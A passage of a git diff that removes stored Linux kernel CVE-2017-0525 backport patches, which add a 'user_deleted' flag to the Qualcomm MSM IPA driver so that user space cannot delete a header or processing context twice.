--			(struct ipa_ioc_del_hdr_proc_ctx *)param)) {
-+		if (ipa3_del_hdr_proc_ctx_by_user(
-+			(struct ipa_ioc_del_hdr_proc_ctx *)param, true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -3003,7 +3004,7 @@ fail_schedule_delayed_work:
- 	if (ipa3_ctx->dflt_v4_rt_rule_hdl)
- 		__ipa3_del_rt_rule(ipa3_ctx->dflt_v4_rt_rule_hdl);
- 	if (ipa3_ctx->excp_hdr_hdl)
--		__ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl);
-+		__ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl, false);
- 	ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_cmd);
- fail_cmd:
- 	return result;
-@@ -3015,7 +3016,7 @@ static void ipa3_teardown_apps_pipes(void)
- 	ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_data_in);
- 	__ipa3_del_rt_rule(ipa3_ctx->dflt_v6_rt_rule_hdl);
- 	__ipa3_del_rt_rule(ipa3_ctx->dflt_v4_rt_rule_hdl);
--	__ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl);
-+	__ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl, false);
- 	ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_cmd);
- }
- 
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c
-index c7202be..1c3af6e 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -573,7 +573,8 @@ error:
- 	return -EPERM;
- }
- 
--static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
-+static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl,
-+	bool release_hdr, bool by_user)
- {
- 	struct ipa3_hdr_proc_ctx_entry *entry;
- 	struct ipa3_hdr_proc_ctx_tbl *htbl = &ipa3_ctx->hdr_proc_ctx_tbl;
-@@ -587,6 +588,14 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	IPADBG("del proc ctx cnt=%d ofst=%d\n",
- 		htbl->proc_ctx_cnt, entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("proc_ctx already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("proc_ctx_hdl %x ref_cnt %d\n",
- 			proc_ctx_hdl, entry->ref_cnt);
-@@ -594,7 +603,7 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	}
- 
- 	if (release_hdr)
--		__ipa3_del_hdr(entry->hdr->id);
-+		__ipa3_del_hdr(entry->hdr->id, false);
- 
- 	/* move the offset entry to appropriate free list */
- 	list_move(&entry->offset_entry->link,
-@@ -611,7 +620,7 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- }
- 
- 
--int __ipa3_del_hdr(u32 hdr_hdl)
-+int __ipa3_del_hdr(u32 hdr_hdl, bool by_user)
- {
- 	struct ipa3_hdr_entry *entry;
- 	struct ipa3_hdr_tbl *htbl = &ipa3_ctx->hdr_tbl;
-@@ -622,7 +631,7 @@ int __ipa3_del_hdr(u32 hdr_hdl)
- 		return -EINVAL;
- 	}
- 
--	if (!entry || (entry->cookie != IPA_COOKIE)) {
-+	if (entry->cookie != IPA_COOKIE) {
- 		IPAERR("bad parm\n");
- 		return -EINVAL;
- 	}
-@@ -635,6 +644,14 @@ int __ipa3_del_hdr(u32 hdr_hdl)
- 			entry->hdr_len, htbl->hdr_cnt,
- 			entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("proc_ctx already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt);
- 		return 0;
-@@ -645,7 +662,7 @@ int __ipa3_del_hdr(u32 hdr_hdl)
- 			entry->phys_base,
- 			entry->hdr_len,
- 			DMA_TO_DEVICE);
--		__ipa3_del_hdr_proc_ctx(entry->proc_ctx->id, false);
-+		__ipa3_del_hdr_proc_ctx(entry->proc_ctx->id, false, false);
- 	} else {
- 		/* move the offset entry to appropriate free list */
- 		list_move(&entry->offset_entry->link,
-@@ -707,15 +724,16 @@ bail:
- }
- 
- /**
-- * ipa3_del_hdr() - Remove the specified headers from SW and optionally commit them
-- * to IPA HW
-+ * ipa3_del_hdr_by_user() - Remove the specified headers
-+ * from SW and optionally commit them to IPA HW
-  * @hdls:	[inout] set of headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+int ipa3_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user)
- {
- 	int i;
- 	int result = -EFAULT;
-@@ -727,7 +745,7 @@ int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls)
- 
- 	mutex_lock(&ipa3_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa3_del_hdr(hdls->hdl[i].hdl)) {
-+		if (__ipa3_del_hdr(hdls->hdl[i].hdl, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -748,6 +766,20 @@ bail:
- }
- 
- /**
-+ * ipa3_del_hdr() - Remove the specified headers from SW and optionally commit them
-+ * to IPA HW
-+ * @hdls:	[inout] set of headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+{
-+	return ipa3_del_hdr_by_user(hdls, false);
-+}
-+
-+/**
-  * ipa3_add_hdr_proc_ctx() - add the specified headers to SW
-  * and optionally commit them to IPA HW
-  * @proc_ctxs:	[inout] set of processing context headers to add
-@@ -792,16 +824,18 @@ bail:
- }
- 
- /**
-- * ipa3_del_hdr_proc_ctx() -
-+ * ipa3_del_hdr_proc_ctx_by_user() -
-  * Remove the specified processing context headers from SW and
-  * optionally commit them to IPA HW.
-  * @hdls:	[inout] set of processing context headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+int ipa3_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user)
- {
- 	int i;
- 	int result;
-@@ -813,7 +847,7 @@ int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
- 
- 	mutex_lock(&ipa3_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa3_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) {
-+		if (__ipa3_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -834,6 +868,21 @@ bail:
- }
- 
- /**
-+ * ipa3_del_hdr_proc_ctx() -
-+ * Remove the specified processing context headers from SW and
-+ * optionally commit them to IPA HW.
-+ * @hdls:	[inout] set of processing context headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+{
-+	return ipa3_del_hdr_proc_ctx_by_user(hdls, false);
-+}
-+
-+/**
-  * ipa3_commit_hdr() - commit to IPA HW the current header table in SW
-  *
-  * Returns:	0 on success, negative on failure
-@@ -1061,7 +1110,7 @@ int __ipa3_release_hdr(u32 hdr_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa3_del_hdr(hdr_hdl)) {
-+	if (__ipa3_del_hdr(hdr_hdl, false)) {
- 		IPADBG("fail to del hdr %x\n", hdr_hdl);
- 		result = -EFAULT;
- 		goto bail;
-@@ -1089,7 +1138,7 @@ int __ipa3_release_hdr_proc_ctx(u32 proc_ctx_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa3_del_hdr_proc_ctx(proc_ctx_hdl, true)) {
-+	if (__ipa3_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) {
- 		IPADBG("fail to del hdr %x\n", proc_ctx_hdl);
- 		result = -EFAULT;
- 		goto bail;
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-index a6c74973..3f19c21 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-@@ -316,6 +316,7 @@ struct ipa3_rt_tbl {
-  * @id: header entry id
-  * @is_eth2_ofst_valid: is eth2_ofst field valid?
-  * @eth2_ofst: offset to start of Ethernet-II/802.3 header
-+ * @user_deleted: is the header deleted by the user?
-  */
- struct ipa3_hdr_entry {
- 	struct list_head link;
-@@ -333,6 +334,7 @@ struct ipa3_hdr_entry {
- 	int id;
- 	u8 is_eth2_ofst_valid;
- 	u16 eth2_ofst;
-+	bool user_deleted;
- };
- 
- /**
-@@ -372,6 +374,7 @@ struct ipa3_hdr_proc_ctx_offset_entry {
-  * @cookie: cookie used for validity check
-  * @ref_cnt: reference counter of routing table
-  * @id: processing context header entry id
-+ * @user_deleted: is the hdr processing context deleted by the user?
-  */
- struct ipa3_hdr_proc_ctx_entry {
- 	struct list_head link;
-@@ -381,6 +384,7 @@ struct ipa3_hdr_proc_ctx_entry {
- 	u32 cookie;
- 	u32 ref_cnt;
- 	int id;
-+	bool user_deleted;
- };
- 
- /**
-@@ -1520,6 +1524,8 @@ int ipa3_add_hdr(struct ipa_ioc_add_hdr *hdrs);
- 
- int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls);
- 
-+int ipa3_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user);
-+
- int ipa3_commit_hdr(void);
- 
- int ipa3_reset_hdr(void);
-@@ -1537,6 +1543,9 @@ int ipa3_add_hdr_proc_ctx(struct ipa_ioc_add_hdr_proc_ctx *proc_ctxs);
- 
- int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls);
- 
-+int ipa3_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user);
-+
- /*
-  * Routing
-  */
-@@ -1842,7 +1851,7 @@ int ipa3_active_clients_log_print_table(char *buf, int size);
- void ipa3_active_clients_log_clear(void);
- int ipa3_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev);
- int __ipa3_del_rt_rule(u32 rule_hdl);
--int __ipa3_del_hdr(u32 hdr_hdl);
-+int __ipa3_del_hdr(u32 hdr_hdl, bool by_user);
- int __ipa3_release_hdr(u32 hdr_hdl);
- int __ipa3_release_hdr_proc_ctx(u32 proc_ctx_hdl);
- int _ipa_read_ep_reg_v3_0(char *buf, int max_len, int pipe);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0525/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-0525/4.4/0003.patch
deleted file mode 100644
index f26370ee..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0525/4.4/0003.patch
+++ /dev/null
@@ -1,669 +0,0 @@
-From 7452cc75cbd363107a1e5d4c5f1327d3edc797ef Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi <gfodi@codeaurora.org>
-Date: Thu, 12 Jan 2017 15:14:15 +0200
-Subject: msm: ipa: Prevent multiple header deletion from user space
-
-An IPA header or processing context can be added once
-and later deleted once from user space.
-Multiple deletion may cause invalid state of the headers
-software cache.
-
-Change-Id: Ic0b8472b7fd8a76233a007d90c832af726184574
-CRs-fixed: 1097714
-Signed-off-by: Ghanim Fodi <gfodi@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_v2/ipa.c     | 13 ++---
- drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c | 79 +++++++++++++++++++++++++------
- drivers/platform/msm/ipa/ipa_v2/ipa_i.h   | 11 ++++-
- drivers/platform/msm/ipa/ipa_v3/ipa.c     | 13 ++---
- drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c | 79 +++++++++++++++++++++++++------
- drivers/platform/msm/ipa/ipa_v3/ipa_i.h   | 13 ++++-
- 6 files changed, 163 insertions(+), 45 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa.c b/drivers/platform/msm/ipa/ipa_v2/ipa.c
-index d82651f..09ec845 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -733,7 +733,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--		if (ipa2_del_hdr((struct ipa_ioc_del_hdr *)param)) {
-+		if (ipa2_del_hdr_by_user((struct ipa_ioc_del_hdr *)param,
-+			true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -1417,8 +1418,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--		if (ipa2_del_hdr_proc_ctx(
--			(struct ipa_ioc_del_hdr_proc_ctx *)param)) {
-+		if (ipa2_del_hdr_proc_ctx_by_user(
-+			(struct ipa_ioc_del_hdr_proc_ctx *)param, true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -2715,7 +2716,7 @@ fail_schedule_delayed_work:
- 	if (ipa_ctx->dflt_v4_rt_rule_hdl)
- 		__ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
- 	if (ipa_ctx->excp_hdr_hdl)
--		__ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+		__ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- 	ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- fail_cmd:
- 	return result;
-@@ -2727,7 +2728,7 @@ static void ipa_teardown_apps_pipes(void)
- 	ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_data_in);
- 	__ipa_del_rt_rule(ipa_ctx->dflt_v6_rt_rule_hdl);
- 	__ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
--	__ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+	__ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- 	ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- }
- 
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c
-index 40d42e17..51f34f0 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -741,7 +741,8 @@ error:
- 	return -EPERM;
- }
- 
--static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
-+static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl,
-+	bool release_hdr, bool by_user)
- {
- 	struct ipa_hdr_proc_ctx_entry *entry;
- 	struct ipa_hdr_proc_ctx_tbl *htbl = &ipa_ctx->hdr_proc_ctx_tbl;
-@@ -755,6 +756,14 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	IPADBG("del ctx proc cnt=%d ofst=%d\n",
- 		htbl->proc_ctx_cnt, entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("proc_ctx already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("proc_ctx_hdl %x ref_cnt %d\n",
- 			proc_ctx_hdl, entry->ref_cnt);
-@@ -762,7 +771,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	}
- 
- 	if (release_hdr)
--		__ipa_del_hdr(entry->hdr->id);
-+		__ipa_del_hdr(entry->hdr->id, false);
- 
- 	/* move the offset entry to appropriate free list */
- 	list_move(&entry->offset_entry->link,
-@@ -779,7 +788,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- }
- 
- 
--int __ipa_del_hdr(u32 hdr_hdl)
-+int __ipa_del_hdr(u32 hdr_hdl, bool by_user)
- {
- 	struct ipa_hdr_entry *entry;
- 	struct ipa_hdr_tbl *htbl = &ipa_ctx->hdr_tbl;
-@@ -790,7 +799,7 @@ int __ipa_del_hdr(u32 hdr_hdl)
- 		return -EINVAL;
- 	}
- 
--	if (!entry || (entry->cookie != IPA_COOKIE)) {
-+	if (entry->cookie != IPA_COOKIE) {
- 		IPAERR("bad parm\n");
- 		return -EINVAL;
- 	}
-@@ -802,6 +811,14 @@ int __ipa_del_hdr(u32 hdr_hdl)
- 		IPADBG("del hdr of sz=%d hdr_cnt=%d ofst=%d\n", entry->hdr_len,
- 			htbl->hdr_cnt, entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("hdr already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt);
- 		return 0;
-@@ -812,7 +829,7 @@ int __ipa_del_hdr(u32 hdr_hdl)
- 			entry->phys_base,
- 			entry->hdr_len,
- 			DMA_TO_DEVICE);
--		__ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false);
-+		__ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false, false);
- 	} else {
- 		/* move the offset entry to appropriate free list */
- 		list_move(&entry->offset_entry->link,
-@@ -879,15 +896,16 @@ bail:
- }
- 
- /**
-- * ipa2_del_hdr() - Remove the specified headers from SW and optionally commit them
-- * to IPA HW
-+ * ipa2_del_hdr_by_user() - Remove the specified headers
-+ * from SW and optionally commit them to IPA HW
-  * @hdls:	[inout] set of headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+int ipa2_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user)
- {
- 	int i;
- 	int result = -EFAULT;
-@@ -904,7 +922,7 @@ int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls)
- 
- 	mutex_lock(&ipa_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa_del_hdr(hdls->hdl[i].hdl)) {
-+		if (__ipa_del_hdr(hdls->hdl[i].hdl, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -925,6 +943,20 @@ bail:
- }
- 
- /**
-+ * ipa2_del_hdr() - Remove the specified headers from SW
-+ * and optionally commit them to IPA HW
-+ * @hdls:	[inout] set of headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+{
-+	return ipa2_del_hdr_by_user(hdls, false);
-+}
-+
-+/**
-  * ipa2_add_hdr_proc_ctx() - add the specified headers to SW
-  * and optionally commit them to IPA HW
-  * @proc_ctxs:	[inout] set of processing context headers to add
-@@ -976,16 +1008,18 @@ bail:
- }
- 
- /**
-- * ipa2_del_hdr_proc_ctx() -
-+ * ipa2_del_hdr_proc_ctx_by_user() -
-  * Remove the specified processing context headers from SW and
-  * optionally commit them to IPA HW.
-  * @hdls:	[inout] set of processing context headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+int ipa2_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user)
- {
- 	int i;
- 	int result;
-@@ -1004,7 +1038,7 @@ int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
- 
- 	mutex_lock(&ipa_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) {
-+		if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -1025,6 +1059,21 @@ bail:
- }
- 
- /**
-+ * ipa2_del_hdr_proc_ctx() -
-+ * Remove the specified processing context headers from SW and
-+ * optionally commit them to IPA HW.
-+ * @hdls:	[inout] set of processing context headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+{
-+	return ipa2_del_hdr_proc_ctx_by_user(hdls, false);
-+}
-+
-+/**
-  * ipa2_commit_hdr() - commit to IPA HW the current header table in SW
-  *
-  * Returns:	0 on success, negative on failure
-@@ -1252,7 +1301,7 @@ int __ipa_release_hdr(u32 hdr_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa_del_hdr(hdr_hdl)) {
-+	if (__ipa_del_hdr(hdr_hdl, false)) {
- 		IPADBG("fail to del hdr %x\n", hdr_hdl);
- 		result = -EFAULT;
- 		goto bail;
-@@ -1280,7 +1329,7 @@ int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true)) {
-+	if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) {
- 		IPADBG("fail to del hdr %x\n", proc_ctx_hdl);
- 		result = -EFAULT;
- 		goto bail;
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-index 967036a..2c2a9c6 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-@@ -281,6 +281,7 @@ struct ipa_rt_tbl {
-  * @id: header entry id
-  * @is_eth2_ofst_valid: is eth2_ofst field valid?
-  * @eth2_ofst: offset to start of Ethernet-II/802.3 header
-+ * @user_deleted: is the header deleted by the user?
-  */
- struct ipa_hdr_entry {
- 	struct list_head link;
-@@ -298,6 +299,7 @@ struct ipa_hdr_entry {
- 	int id;
- 	u8 is_eth2_ofst_valid;
- 	u16 eth2_ofst;
-+	bool user_deleted;
- };
- 
- /**
-@@ -361,6 +363,7 @@ struct ipa_hdr_proc_ctx_add_hdr_cmd_seq {
-  * @cookie: cookie used for validity check
-  * @ref_cnt: reference counter of routing table
-  * @id: processing context header entry id
-+ * @user_deleted: is the hdr processing context deleted by the user?
-  */
- struct ipa_hdr_proc_ctx_entry {
- 	struct list_head link;
-@@ -370,6 +373,7 @@ struct ipa_hdr_proc_ctx_entry {
- 	u32 cookie;
- 	u32 ref_cnt;
- 	int id;
-+	bool user_deleted;
- };
- 
- /**
-@@ -1400,6 +1404,8 @@ int ipa2_add_hdr(struct ipa_ioc_add_hdr *hdrs);
- 
- int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls);
- 
-+int ipa2_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user);
-+
- int ipa2_commit_hdr(void);
- 
- int ipa2_reset_hdr(void);
-@@ -1417,6 +1423,9 @@ int ipa2_add_hdr_proc_ctx(struct ipa_ioc_add_hdr_proc_ctx *proc_ctxs);
- 
- int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls);
- 
-+int ipa2_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user);
-+
- /*
-  * Routing
-  */
-@@ -1709,7 +1718,7 @@ int ipa2_active_clients_log_print_table(char *buf, int size);
- void ipa2_active_clients_log_clear(void);
- int ipa_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev);
- int __ipa_del_rt_rule(u32 rule_hdl);
--int __ipa_del_hdr(u32 hdr_hdl);
-+int __ipa_del_hdr(u32 hdr_hdl, bool by_user);
- int __ipa_release_hdr(u32 hdr_hdl);
- int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl);
- int _ipa_read_gen_reg_v1_1(char *buff, int max_len);
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa.c b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-index 3d276b0..2da3b0d 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -784,7 +784,8 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--		if (ipa3_del_hdr((struct ipa_ioc_del_hdr *)param)) {
-+		if (ipa3_del_hdr_by_user((struct ipa_ioc_del_hdr *)param,
-+			true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -1553,8 +1554,8 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--		if (ipa3_del_hdr_proc_ctx(
--			(struct ipa_ioc_del_hdr_proc_ctx *)param)) {
-+		if (ipa3_del_hdr_proc_ctx_by_user(
-+			(struct ipa_ioc_del_hdr_proc_ctx *)param, true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -2921,7 +2922,7 @@ fail_schedule_delayed_work:
- 	if (ipa3_ctx->dflt_v4_rt_rule_hdl)
- 		__ipa3_del_rt_rule(ipa3_ctx->dflt_v4_rt_rule_hdl);
- 	if (ipa3_ctx->excp_hdr_hdl)
--		__ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl);
-+		__ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl, false);
- 	ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_cmd);
- fail_cmd:
- 	return result;
-@@ -2933,7 +2934,7 @@ static void ipa3_teardown_apps_pipes(void)
- 	ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_data_in);
- 	__ipa3_del_rt_rule(ipa3_ctx->dflt_v6_rt_rule_hdl);
- 	__ipa3_del_rt_rule(ipa3_ctx->dflt_v4_rt_rule_hdl);
--	__ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl);
-+	__ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl, false);
- 	ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_cmd);
- }
- 
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c
-index 93fa149..69dca76 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -576,7 +576,8 @@ error:
- 	return -EPERM;
- }
- 
--static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
-+static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl,
-+	bool release_hdr, bool by_user)
- {
- 	struct ipa3_hdr_proc_ctx_entry *entry;
- 	struct ipa3_hdr_proc_ctx_tbl *htbl = &ipa3_ctx->hdr_proc_ctx_tbl;
-@@ -590,6 +591,14 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	IPADBG("del proc ctx cnt=%d ofst=%d\n",
